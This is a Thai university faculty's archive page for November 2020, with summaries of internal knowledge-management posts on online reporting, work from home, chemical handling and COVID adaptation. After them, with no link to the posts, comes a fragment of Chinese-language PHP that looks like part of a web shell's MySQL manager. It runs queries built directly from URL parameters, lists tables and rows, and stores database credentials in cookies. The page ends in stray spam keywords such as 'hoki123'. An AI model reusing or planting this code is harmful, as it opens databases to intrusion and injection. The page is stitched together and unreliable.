Monthly Archive: พฤศจิกายน 2020

0

การพัฒนารูปแบบการรายงานผลการดำเนินงานโครงการผ่านระบบออนไลน์ “QR Code : Scan Me รายงานผลทันที”

ศูนย์วิทยาศาสตร์ฯ พัฒนารูปแบบการรายงานผลการดำเนินงานโครงการผ่านระบบออนไลน์ QR Code : Scan Me รายงานผลทันที” เพื่อเพิ่มประสิทธิภาพงานบริการวิชาการค่ายวิทยาศาสตร์ ทำให้การรายงานผลถูกต้อง รวดเร็ว มีความทันสมัย อำนวยความสะดวกสำหรับผู้รับบริการ หลักสูตรวิชา สามารถเข้าถึงข้อมูลได้ง่าย เป็นสารสนเทศที่ใช้สนับสนุนงานประกันคุณภาพการศึกษาในโรงเรียน ระดับคณะ และระดับมหาวิทยาลัย ตามลำดับ

0

การลงเวลาปฏิบัติราชการ ผ่านระบบออนไลน์ บุคลากรสายสนับสนุนศูนย์วิทยาศาสตร์ กรณี Work from home

ศูนย์วิทยาศาสตร์ฯ นำระบบการลงเวลาปฏิบัติงาน บุคลากรสายสนับสนุนศูนย์วิทยาศาสตร์ มาใช้ในการปฏิบัติงานช่วง Work from home เพื่อการปรับเปลี่ยนวิธีการทำงานตามสถานการณ์ ระบบการลงเวลาปฏิบัติงานออนไลน์ ผู้ใช้งานสามารถลงเวลาการปฏิบัติงานได้ทุกสถานที่ เพื่อการบันทึกข้อมูลหลักฐานยืนยันตัวตนในการปฏิบัติงาน และทำให้เกิดความสะดวกในการจัดเก็บข้อมูลของการปฏิบัติงานบุคคลภายในหน่วยงาน

0

การจัดการสารเคมีอย่างเป็นระบบและมีประสิทธิภาพ

ศูนย์วิทยาศาสตร์ฯ มีการใช้งานโปรแกรมการจัดการสารเคมี (ChemInvent2015) เพื่อในการใช้ตรวจสอบ การบันทึกและติดตามความเคลื่อนไหวของสารเคมี เพื่อให้การเกิดประสิทธิภาพสูงสุดในการใช้สารเคมี และความปลอดภัยในห้องปฏิบัติการ

0

Google Calendar พามาใช้เครื่องมือวิทย์

ศูนย์วิทยาศาสตร์ฯ ได้ประยุกต์ใช้ปฏิทินแบบออนไลน์ (Google calendar) สำหรับขอใช้บริการเครื่องมือวิทยาศาสตร์ทางเคมี มีความสะดวก รวดเร็ว ประหยัดเวลา ประหยัดค่าใช้จ่ายในการจัดทำเอกสาร และเพื่อให้สอดคล้องกับนโยบายลดการใช้กระดาษ (Paperless) อย่างมีประสิทธิภาพ

0

การปรับตัวช่วงสถานการณ์ COVID 19 เพื่อการบริการที่ดี

ศูนย์การศึกษาพิเศษ ได้มีการแลกเปลี่ยนเรียนรู้ร่วมกันผ่านการ SWOT ของหน่วยงาน จนเกิดเป็นแนวปฏิบัติเพื่อรองรับการปรับตัวสู่วิถีการดำเนินชีวิตใหม่ New Normal ให้เป็นไปอย่างเหมาะสม โดยคำนึงผู้รับบริการเป็นสำคัญ ทั้งด้านความปลอดภัย การเข้าถึงบริการของหน่วยงานได้อย่างเหมาะสม แม้จะอยู่ในช่วงสถานการณ์การแพร่ระบาดของเชื้อไวรัสโคโรนา 2019 (COVID-19) เพราะโลกได้เปลี่ยนไป พวกเราจึงต้องปรับตัว และแสดงศักยภาพให้เต็มที่ และร่วมกันแชร์ประสบการณ์ที่ดีร่วมกัน

0

การจัดการของเสียอันตรายจากสารเคมีในห้องปฏิบัติการ : ศูนย์วิทยาศาสตร์ฯ

ศูนย์วิทยาศาสตร์ฯ นำเสนอแนวทางการจัดการของเสียอันตรายจากสารเคมีในห้องปฏิบัติการ เพื่อให้ได้ห้องปฏิบัติการที่เอื้อต่อการทำงาน สร้างความมั่นใจในการทำงานที่ปลอดภัยให้กับนักศึกษา อาจารย์ พนักงาน และบุคลากร อันจะเป็นพื้นฐานที่สำคัญในการดำรงชีวิต

0

การจัดการความรู้รายวิชาภาษาอังกฤษสำหรับครูวิทยาศาสตร์ เพื่อการสอนวิทยาศาสตร์ด้วยภาษาอังกฤษสำหรับโครงการค่ายวิทยาศาสตร์ ปี 2562

ศูนย์วิทยาศาสตร์ได้ดำเนินการจัดการโครงการค่ายวิทยาศาสตร์ ให้ความรู้กับนักเรียนของโรงเรียนในเขตพื้นที่บริการ อาจารย์ผู้สอนได้ใช้ประสบการณ์การสอนวิทยาศาสตร์เป็นภาษาอังกฤษในห้องเรียน มาทดลองใช้กับโครงการค่ายวิทยาศาสตร์เพื่อเพิ่มความเชี่ยวชาญในการสอน และนักศึกษาชั้นปีที่ 3 ได้ลองนำความรู้และทักษะด้านภาษาอังกฤษที่ได้เรียนมาประยุกต์ใช้ในฐานะผู้ช่วยวิทยากรค่ายวิทยาศาสตร์เพื่อให้การดำเนินการค่ายวิทยาศาสตร์บรรลุวัตถุประสงค์ของโครงการ

0

เทคนิคการเขียนหนังสือราชการภายนอก

สำนักงานคณบดีคณะวิทยาศาสตร์และเทคโนโลยี ได้มีการหารือร่วมกันกับบุคลากรที่มีส่วนเกี่ยวข้องการการปฏิบัติงานด้านธุรการและงานสารบรรณ เพื่อให้เกิดความรู้ความเข้าใจไปในทิศทางเดียวกัน ลดปัญหาการผิดพลาดในการร่างหนังสือที่ส่งออกไปติดต่อกับหน่วยงานทั้งภายในและภายนอก เพื่อสร้างความเข้าใจที่ถูกต้องให้แก่บุคลากรที่ปฏิบัติงานด้านเอกสารให้เป็นไปตามระเบียบสำนักนายกรัฐมนตรี ว่าด้วย งานสารบรรณ พ.ศ. 2526

0

“ออกแบบและพัฒนาผลิตภัณฑ์สินค้า ” สถาบันวิจัยไม้กลายเป็นหินฯ

สถาบันฯ ได้มีการออกแบบและพัฒนาผลิตภัณฑ์ที่เป็นเอกลักษณ์เฉพาะ และเพื่อเป็นการทำให้ผู้ที่สนใจได้รับทราบข้อมูลเกี่ยวกับผลิตภัณฑ์ ซึ่งเกิดจากการถ่ายทอดองค์ความรู้ที่ได้จากนักวิจัย อีกทั้งยังเป็นการสนับสนุนงานวิจัย งานบริการวิขาการ และงานนิทรรศการ รวมถึงสร้างภาพลักษณ์สถาบันและมหาวิทยาลัย สถาบันฯ จึงได้มีการสร้างผลงานโดยผ่านการถ่ายทอดองค์ความรู้จากนักวิจัยสู่บุคลากรที่มีความชำนาญการ จนได้เป็นผลิตภัณฑ์ต้นแบบ

0

แนวทางปฏิบัติงาน Work from home สถาบันวิจัยไม้กลายเป็นหินฯ

สถาบันวิจัยไม้กลายเป็นหินฯ เป็นหน่วยงานหนึ่งที่ได้รับผลกระทบเป็นอย่างมาก จากสถานการณ์โรคไวรัสโคโรนา สายพันธุ์ใหม่ 2019 เนื่องจากพันธกิจของสถาบันที่เป็นทั้งหน่วยงานให้บริการความรู้ผ่านพิพิธภัณฑ์ ให้บริการวิชาการแก่สังคม และการศึกษาวิจัยร่วมกับหน่วยงานภายนอก ทำให้พิพิธภัณฑ์ต้องปิดให้บริการและต้องเปลี่ยนรูปแบบการทำงานใหม่ตามนโยบายของภาครัฐ จากสถานการณ์ดังกล่าวทางสถาบันจึงได้คิดแนวทางและรูปแบบการปฏิบัติงาน Work from home เพื่อเป็นแนวทางในการปฏิบัติงานให้มีระบบการติดตามงานที่บรรลุเป้าหมายอย่างมีประสิทธิภาพต่อไป

foreach ($fields as $row) { echo '' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . ""; } echo "" . "\r\n"; $v++; } echo "
"; $pagep = $page - 1; $pagen = $page + 1; echo "共有 " . $row_num . " 条记录 "; $pagenav = ""; $pageStr = $row_num > 0 ? $page : "0"; $charseta = isset($_GET['charset']) ? $_GET['charset'] : ""; if ($pagep > 0) { $pagenav .= " 首页 上一页 "; } else { $pagenav .= " 上一页 "; } if ($pagen <= $pages) { $pagenav .= " 下一页 尾页"; } else { $pagenav .= " 下一页 "; } $pagenav .= " 第 [" . $pageStr . "/" . $pages . "] 页 跳到页"; echo $pagenav; echo "
"; } } elseif (isset($_GET['insert'])) { echo "' . $_GET['insert'] . "
"; $result = @mysql_query("SELECT * FROM " . $_GET['insert'], $conn); $fieldnum = @mysql_num_fields($result); echo "
'; for ($i = 0; $i < $fieldnum; $i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); echo "
" . $name . " " . $type . '(' . $len . ")
"; } echo "
"; } else { $query = "SHOW TABLE STATUS"; $status = @mysql_query($query, $conn); while ($statu = @mysql_fetch_array($status)) { $statusize[] = $statu['Data_length']; $statucoll[] = $statu['Collation']; } $query = "SHOW TABLES FROM " . $_GET['db'] . ';'; echo "
"; $result = @mysql_query($query, $conn); $k = 0; while ($table = @mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ""; echo ""; echo '" . "\r\n"; $k++; } echo "
表名 操作 字符集 大小
' . $table[0] . " 删除 ' . $statucoll[$k] . "" . File_Size($statusize[$k]) . "
"; } } } else { $cookietime = time() - 6 * 3600; setcookie($cookie_name_mysql . 'host', "", $cookietime); setcookie($cookie_name_mysql . 'port', "", $cookietime); setcookie($cookie_name_mysql . 'user', "", $cookietime); setcookie($cookie_name_mysql . 'pass', "", $cookietime); die("连接MYSQL失败,请重新登陆."); } break; default: html_main(); break; } css_foot(); ob_end_flush();

sheds plans
hoki123